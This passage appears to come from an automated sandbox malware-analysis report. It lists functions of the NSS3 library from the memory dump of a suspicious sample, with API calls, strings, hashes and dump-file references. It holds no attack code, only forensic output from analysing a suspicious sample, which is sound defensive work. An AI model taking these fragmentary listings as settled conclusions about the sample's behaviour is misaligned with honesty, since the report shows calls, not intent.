                                                                                                                                                                                                                            • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4030862364-0
                                                                                                                                                                                                                            • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                            • Instruction ID: bca36fa57249b7609323bc53197de5fe9c0fb5f60d14a4e31683993860d298d1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13112BB9A106506FE7205E65EC41B9BB3F4EF11308F504534E42A87B20F632F81EC663
                                                                                                                                                                                                                            Function 6CBBFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CBBFE08
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CBBFE1D
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC116E
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CBBFE29
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CBBFE3D
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CBBFE62
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?), ref: 6CBBFE6F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 660648399-0
                                                                                                                                                                                                                            • Opcode ID: 01cb3a8fe20e45e875c424f3ac1baf28a0d09430838b5f7aa9b67864e643ef4b
                                                                                                                                                                                                                            • Instruction ID: c3bec5afbd5c1ad764d0fc4cf2a6bccae3f419378521507048c8f6a4f782b781
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01cb3a8fe20e45e875c424f3ac1baf28a0d09430838b5f7aa9b67864e643ef4b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE11CCBE6002856BEF018F55DC40A7B7398EF54299F148034F91DA7B12EB31D914C793
                                                                                                                                                                                                                            Function 6CC6FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_Lock.NSS3 ref: 6CC6FD9E
                                                                                                                                                                                                                              • Part of subcall function 6CC29BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CB51A48), ref: 6CC29BB3
                                                                                                                                                                                                                              • Part of subcall function 6CC29BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB51A48), ref: 6CC29BC8
                                                                                                                                                                                                                            • PR_WaitCondVar.NSS3(000000FF), ref: 6CC6FDB9
                                                                                                                                                                                                                              • Part of subcall function 6CB4A900: TlsGetValue.KERNEL32(00000000,?,6CCC14E4,?,6CAE4DD9), ref: 6CB4A90F
                                                                                                                                                                                                                              • Part of subcall function 6CB4A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CB4A94F
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CC6FDD4
                                                                                                                                                                                                                            • PR_Lock.NSS3 ref: 6CC6FDF2
                                                                                                                                                                                                                            • PR_NotifyAllCondVar.NSS3 ref: 6CC6FE0D
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CC6FE23
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3365241057-0
                                                                                                                                                                                                                            • Opcode ID: 10fd19d43d4b74e5292e8bc056885ef088fa002a38238a3d7318a2fbb3b13741
                                                                                                                                                                                                                            • Instruction ID: 1dd6ba34e60ff09d3f101f3c4c507870761112468c170fa751020d13ae6c0665
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10fd19d43d4b74e5292e8bc056885ef088fa002a38238a3d7318a2fbb3b13741
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C0161B6A14241AFDF149F1AFD008557A31FB0226871543B4E82647FE1F722EE28C6C1
                                                                                                                                                                                                                            Function 6CBAFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CBAFC55
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CBAFCB2
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CBAFDB7
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CBAFDDE
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: TlsGetValue.KERNEL32(?,6CBC085A,00000000,?,6CB68369,?), ref: 6CBB8821
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: TlsGetValue.KERNEL32(?,?,6CBC085A,00000000,?,6CB68369,?), ref: 6CBB883D
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: EnterCriticalSection.KERNEL32(?,?,?,6CBC085A,00000000,?,6CB68369,?), ref: 6CBB8856
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CBB8887
                                                                                                                                                                                                                              • Part of subcall function 6CBB8800: PR_Unlock.NSS3(?,?,?,?,6CBC085A,00000000,?,6CB68369,?), ref: 6CBB8899
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                            • String ID: pkcs11:
                                                                                                                                                                                                                            • API String ID: 362709927-2446828420
                                                                                                                                                                                                                            • Opcode ID: 836cb00687d7eeb177d546c46e93d644cc82372716e4ca6d9712033d076715e1
                                                                                                                                                                                                                            • Instruction ID: a96e3e4bf41e79344b102f2b90d02201d4a6496a52a93d32e7d03af34cda755e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 836cb00687d7eeb177d546c46e93d644cc82372716e4ca6d9712033d076715e1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B51C3B1A081A1ABEB028FA99C40BEE7375EB41359F150025DDC46BB51EB31E906CB93
                                                                                                                                                                                                                            Function 6CAEBDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcmp.VCRUNTIME140(00000000,?,?), ref: 6CAEBE02
                                                                                                                                                                                                                              • Part of subcall function 6CC19C40: memcmp.VCRUNTIME140(?,00000000,6CAEC52B), ref: 6CC19D53
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEBE9F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • database corruption, xrefs: 6CAEBE93
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAEBE89
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CAEBE98
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcmp$sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 1135338897-598938438
                                                                                                                                                                                                                            • Opcode ID: b4b0c5966ece19b091aa9bff1963ec805b278abd11ec08845cee565267a9b70c
                                                                                                                                                                                                                            • Instruction ID: 3c897b155c9a0aa067929456bbecdc7baf383d7f6637197606cc66ddde0b3178
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4b0c5966ece19b091aa9bff1963ec805b278abd11ec08845cee565267a9b70c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF315931A043558BC300CF69E8D8AABBBB2AF4A314F0C8654EE841BB41D330EC85D7D4
                                                                                                                                                                                                                            Function 6CB50DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CB50BDE), ref: 6CB50DCB
                                                                                                                                                                                                                            • strrchr.VCRUNTIME140(00000000,0000005C,?,6CB50BDE), ref: 6CB50DEA
                                                                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CB50BDE), ref: 6CB50DFC
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CB50BDE), ref: 6CB50E32
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • %s incr => %d (find lib), xrefs: 6CB50E2D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                            • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                            • API String ID: 97259331-2309350800
                                                                                                                                                                                                                            • Opcode ID: 310f2df5f6d5405008a8bfe7186f6db2bdcf88f505071da12943d1d26dc4f9fd
                                                                                                                                                                                                                            • Instruction ID: 42f6d18707646c96a49b8fc1fe60fa57cf471119c57991d02877ef9d3a1f179f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 310f2df5f6d5405008a8bfe7186f6db2bdcf88f505071da12943d1d26dc4f9fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2012472B002549FE7209F24AC45E1773BCDB45A0DB54442EE909D3A41F762EC24C7E1
                                                                                                                                                                                                                            Function 6CAF9C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CAF9CF2
                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6CAF9D45
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CAF9D8B
                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6CAF9DDE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3168844106-0
                                                                                                                                                                                                                            • Opcode ID: 96334b95626e07bec93976bee438dcdb45ced7636db839f55cd5184289f430a6
                                                                                                                                                                                                                            • Instruction ID: bbd833aa708b3c7320627f23f9b6137cf2813a841ff2605273620c114d666395
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96334b95626e07bec93976bee438dcdb45ced7636db839f55cd5184289f430a6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FA1AE317042008FEB08EF75EA9877E3775AB86715F1C012DE42647A40DB3AE987DB92
                                                                                                                                                                                                                            Function 6CC0DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DE1B
                                                                                                                                                                                                                            • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CC0DE77
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2700453212-0
                                                                                                                                                                                                                            • Opcode ID: dbb2f79871749b062c6bbdd23778ac4501a1b9207887d3a2426f4daf218794e5
                                                                                                                                                                                                                            • Instruction ID: b2763ac0b4869f4cc715e8940faae0c7ea2725c69a93290c3995697e8f8a24b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbb2f79871749b062c6bbdd23778ac4501a1b9207887d3a2426f4daf218794e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8717771A00318CFDB10CF9AC5C069AB7B4FF89718F25816DD9696B702E772A942CF90
                                                                                                                                                                                                                            Function 6CB5EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB5EDFD
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000000), ref: 6CB5EE64
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CB5EECC
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB5EEEB
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB5EEF6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3833505462-0
                                                                                                                                                                                                                            • Opcode ID: 248bca223a2bbbe5918870e758180c54810624581c031a82addb4274ab83f3f4
                                                                                                                                                                                                                            • Instruction ID: c9e87bec3252d3146bc66a9b96ce4c54dc0f9f753d15d460fb26054785116bea
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 248bca223a2bbbe5918870e758180c54810624581c031a82addb4274ab83f3f4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD312871B002C09BE7209F2CCC4476A7BF4FB46305F940529E85A87A50E735E525CBE2
                                                                                                                                                                                                                            Function 6CB61DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CB61E0B
                                                                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CB61E24
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB61E3B
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CB61E8A
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CB61EAD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1529734605-0
                                                                                                                                                                                                                            • Opcode ID: 1ac1ffc9b3907c3c3807d2400f637dcae9c8e2bb26e5e1f4e2f5adcdc47c3541
                                                                                                                                                                                                                            • Instruction ID: 2bbc6c41009db5c7dfd26862bf05aebc45ec7c8c9f7daf010312c5c2d6d46fcb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ac1ffc9b3907c3c3807d2400f637dcae9c8e2bb26e5e1f4e2f5adcdc47c3541
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B21F272E08354ABD7008F6ADC40B9BB3A4DB84369F194638ED5967B84E731D90887E3
                                                                                                                                                                                                                            Function 6CB6AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,6CB63FFF,00000000,?,?,?,?,?,6CB61A1C,00000000,00000000), ref: 6CB6ADA7
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: TlsGetValue.KERNEL32 ref: 6CBC14E0
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: EnterCriticalSection.KERNEL32 ref: 6CBC14F5
                                                                                                                                                                                                                              • Part of subcall function 6CBC14C0: PR_Unlock.NSS3 ref: 6CBC150D
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CB63FFF,00000000,?,?,?,?,?,6CB61A1C,00000000,00000000), ref: 6CB6ADB4
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,6CB63FFF,?,?,?,?,6CB63FFF,00000000,?,?,?,?,?,6CB61A1C,00000000), ref: 6CB6ADD5
